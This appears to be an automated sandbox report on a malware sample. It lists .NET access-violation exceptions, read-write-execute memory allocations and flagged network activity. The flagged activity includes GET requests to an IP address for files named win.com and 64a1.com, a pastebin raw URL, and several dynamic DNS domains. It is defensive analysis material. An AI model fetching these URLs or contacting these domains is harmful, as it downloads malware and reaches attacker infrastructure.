registers.ecx: 0	1
__exception__ April 12, 2021, 10:42 a.m.	stacktrace: 0xab0567 0xab603c 0xab5fca mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x2c00f6 @ 0x635500f6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 147909792 registers.edi: 34819012 registers.eax: 0 registers.ebp: 147909832 registers.edx: 195 registers.ebx: 34818888 registers.esi: 37828892 registers.ecx: 0	1
__exception__ April 12, 2021, 10:42 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3cb2 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34938888 registers.esi: 37860956 registers.ecx: 0	1
__exception__ April 12, 2021, 10:42 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3dee mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34939004 registers.esi: 38010520 registers.ecx: 0	1
__exception__ April 12, 2021, 10:42 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3cb2 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34938888 registers.esi: 38062004 registers.ecx: 0	1
__exception__ April 12, 2021, 10:42 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3dee mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34939004 registers.esi: 38204932 registers.ecx: 0	1
__exception__ April 12, 2021, 10:42 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3cb2 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34938888 registers.esi: 38239884 registers.ecx: 0	1
__exception__ April 12, 2021, 10:42 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3dee mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34816472 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34856328 registers.esi: 35376444 registers.ecx: 0	1
__exception__ April 12, 2021, 10:42 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3cb2 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645840 registers.edi: 34816472 registers.eax: 0 registers.ebp: 97645880 registers.edx: 195 registers.ebx: 34856212 registers.esi: 35411396 registers.ecx: 0	1
__exception__ April 12, 2021, 10:42 a.m.	stacktrace: 0xab0567 0xab603c 0xab5fca mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x2c00f6 @ 0x635500f6 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 160951936 registers.edi: 34816472 registers.eax: 0 registers.ebp: 160951976 registers.edx: 195 registers.ebx: 34816348 registers.esi: 35427324 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://34.126.93.163/xm/win.com
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://34.126.93.163/xm/64a1.com
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/nEZ87Pwx

Connects to a Dynamic DNS Domain (6 events)

domain	niogem1171.ddns.net
domain	muslada2251.ddns.net
domain	niogem1171.bounceme.net
domain	niogem1171.3utilities.com
domain	niogem1171.ddnsking.com
domain	muslada2251.ddnsking.com

Performs some HTTP requests (3 events)

request	GET http://34.126.93.163/xm/win.com
request	GET http://34.126.93.163/xm/64a1.com
request	GET https://pastebin.com/raw/nEZ87Pwx

Allocates read-write-execute memory (usually to unpack itself) (50 out of 374 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 3236 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 8152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74421000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 8084 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 5168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 2340 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 3932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 3004 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744d1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 3464 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 2456 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 7460 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00560000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fc91000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0057a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6fc92000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00572000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00582000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00583000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ee0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00584000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00585000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00586000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:41 a.m.	process_identifier: 6872 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0058a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 1808 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73772000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 12, 2021, 10:40 a.m.	process_identifier: 6792 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
